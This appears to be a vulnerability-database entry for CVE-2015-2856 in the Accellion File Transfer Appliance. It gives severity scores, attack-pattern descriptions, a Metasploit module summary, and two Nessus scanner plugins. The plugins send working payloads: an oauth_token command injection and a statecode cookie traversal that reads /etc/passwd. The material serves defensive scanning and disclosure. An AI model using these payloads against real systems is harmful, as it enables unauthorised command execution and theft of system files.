Vulnerabilities > CVE-2015-2856 - Path Traversal vulnerability in Accellion File Transfer Appliance 80540/912180

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
accellion
CWE-22
nessus
metasploit

Summary

Directory traversal vulnerability in the template function in function.inc in Accellion File Transfer Appliance devices before FTA_9_11_210 allows remote attackers to read arbitrary files via a .. (dot dot) in the statecode cookie.

Vulnerable Configurations

Part Description Count
Application
Accellion
2

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Relative Path Traversal
    An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
  • Directory Traversal
    An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
  • File System Function Injection, Content Based
    An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
  • Using Slashes and URL Encoding Combined to Bypass Validation Logic
    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

Metasploit

descriptionThis module exploits a file disclosure vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'statecode' cookie parameter is appended to a file path that is processed as a HTML template. By prepending this cookie with directory traversal sequence and appending a NULL byte, any file readable by the web user can be exposed. The web user has read access to a number of sensitive files, including the system configuration and files uploaded to the appliance by users. This issue was confirmed on version FTA_9_11_200, but may apply to previous versions as well. This issue was fixed in software update FTA_9_11_210.
idMSF:AUXILIARY/SCANNER/HTTP/ACCELLION_FTA_STATECODE_FILE_READ
last seen2020-06-03
modified2017-07-24
published2015-07-08
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb
titleAccellion FTA 'statecode' Cookie Arbitrary File Read

Nessus

  • NASL familyCGI abuses
    NASL idACCELLION_FTA_OAUTH_TOKEN_RCE.NASL
    descriptionThe remote Accellion Secure File Transfer Appliance is affected by a remote command execution vulnerability due to improper sanitization of user-supplied in put to the
    last seen2020-06-01
    modified2020-06-02
    plugin id85005
    published2015-07-27
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/85005
    titleAccellion Secure File Transfer Appliance 'oauth_token' Parameter Remote Command Execution
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(85005);
      script_version("1.6");
      script_cvs_date("Date: 2019/11/25");
    
      script_cve_id("CVE-2015-2857");
      script_xref(name:"EDB-ID", value:"37597");
    
      script_name(english:"Accellion Secure File Transfer Appliance 'oauth_token' Parameter Remote Command Execution");
      script_summary(english:"Attempts to execute a command.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote device is affected by a remote command execution
    vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The remote Accellion Secure File Transfer Appliance is affected by a
    remote command execution vulnerability due to improper sanitization of
    user-supplied in put to the 'oauth_token' parameter in the
    get_oauth_customer_name() and verify_oauth_token() functions. The
    parameter is passed to a system() command through the 'twsgetStatus'
    handler. A remote, unauthenticated attacker can exploit this
    vulnerability to execute arbitrary commands on the remote host.
    
    Note that the twsPut, twssetStatus, twsGet, Find, Put, and mPut
    handlers are also reportedly affected by this issue; however, Nessus
    has not tested these additional handlers.");
      # https://blog.rapid7.com/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8f6a5d7f");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Accellion Secure File Transfer Appliance version
    FTA_9_11_210 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-2857");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Accellion FTA getStatus verify_oauth_token Command Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2015/07/10");
      script_set_attribute(attribute:"patch_publication_date", value:"2015/05/25");
      script_set_attribute(attribute:"plugin_publication_date", value:"2015/07/27");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/h:accellion:secure_file_transfer_appliance");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("accellion_file_transfer_appliance_detect.nbin");
      script_require_keys("installed_sw/Accellion Secure File Transfer Appliance");
      script_require_ports("Services/www", 80, 443);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("install_func.inc");
    
    app = "Accellion Secure File Transfer Appliance";
    get_install_count(app_name:app, exit_if_zero:TRUE);
    
    port = get_http_port(default:443);
    
    install = get_single_install(app_name:app, port:port);
    install_url = build_url(port:port, qs:"/");
    
    data = "transaction_id=1&oauth_token='%3becho '";
    clear_cookiejar();
    res = http_send_recv3(
      method : "POST",
      port   : port,
      data   : data,
      item   : "/tws/getStatus",
      add_headers  : make_array("Content-Type","application/x-www-form-urlencoded"),
      exit_on_fail : TRUE
    );
    if (!egrep(pattern:'"result_msg":"Success"', string:res[2]))
      audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
    
    security_report_v4(
      port        : port,
      severity    : SECURITY_HOLE,
      cmd         : 'echo',
      line_limit  : 3,
      request     : make_list(http_last_sent_request()),
      output      : chomp(res[2])
    );
    
  • NASL familyCGI abuses
    NASL idACCELLION_FTA_STATECODE_FILE_DISCLOSURE.NASL
    descriptionThe remote Accellion Secure File Transfer Appliance is affected by an arbitrary file disclosure vulnerability due to improper sanitization of user-supplied input to the
    last seen2020-06-01
    modified2020-06-02
    plugin id85006
    published2015-07-27
    reporterThis script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/85006
    titleAccellion Secure File Transfer Appliance 'statecode' Cookie Remote File Disclosure
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(85006);
      script_version("1.8");
      script_cvs_date("Date: 2019/11/25");
    
      script_cve_id("CVE-2015-2856");
    
      script_name(english:"Accellion Secure File Transfer Appliance 'statecode' Cookie Remote File Disclosure");
      script_summary(english:"Attempts to read a local file.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote device is affected by an arbitrary file disclosure
    vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The remote Accellion Secure File Transfer Appliance is affected by an
    arbitrary file disclosure vulnerability due to improper sanitization
    of user-supplied input to the 'statecode' cookie used by the
    template() function in function.inc. A remote, unauthenticated
    attacker can exploit this vulnerability, via a specially crafted
    request, to view arbitrary files on the remote host.");
      # https://blog.rapid7.com/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8f6a5d7f");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Accellion Secure File Transfer Appliance version
    FTA_9_11_210 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-2856");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2015/07/10");
      script_set_attribute(attribute:"patch_publication_date", value:"2015/05/25");
      script_set_attribute(attribute:"plugin_publication_date", value:"2015/07/27");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/h:accellion:secure_file_transfer_appliance");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("accellion_file_transfer_appliance_detect.nbin");
      script_require_keys("installed_sw/Accellion Secure File Transfer Appliance");
      script_require_ports("Services/www", 80, 443);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("install_func.inc");
    
    app = "Accellion Secure File Transfer Appliance";
    get_install_count(app_name:app, exit_if_zero:TRUE);
    
    port = get_http_port(default:443);
    
    install = get_single_install(app_name:app, port:port);
    install_url = build_url(port:port, qs:"/");
    
    cookie   = 'statecode=../../../../../etc/passwd%00';
    file     = '/etc/passwd';
    file_pat = "root:.*:0:[01]:";
    
    clear_cookiejar();
    
    res = http_send_recv3(
      method : "POST",
      port   : port,
      item   : "/courier/intermediate_login.html",
      add_headers  : make_array("Cookie", cookie),
      exit_on_fail : TRUE
    );
    
    if (!egrep(pattern:file_pat, string:res[2]))
      audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
    
    security_report_v4(
      port        : port,
      severity    : SECURITY_WARNING,
      file        : file,
      request     : make_list(http_last_sent_request()),
      output      : chomp(res[2]),
      attach_type : 'text/plain'
    );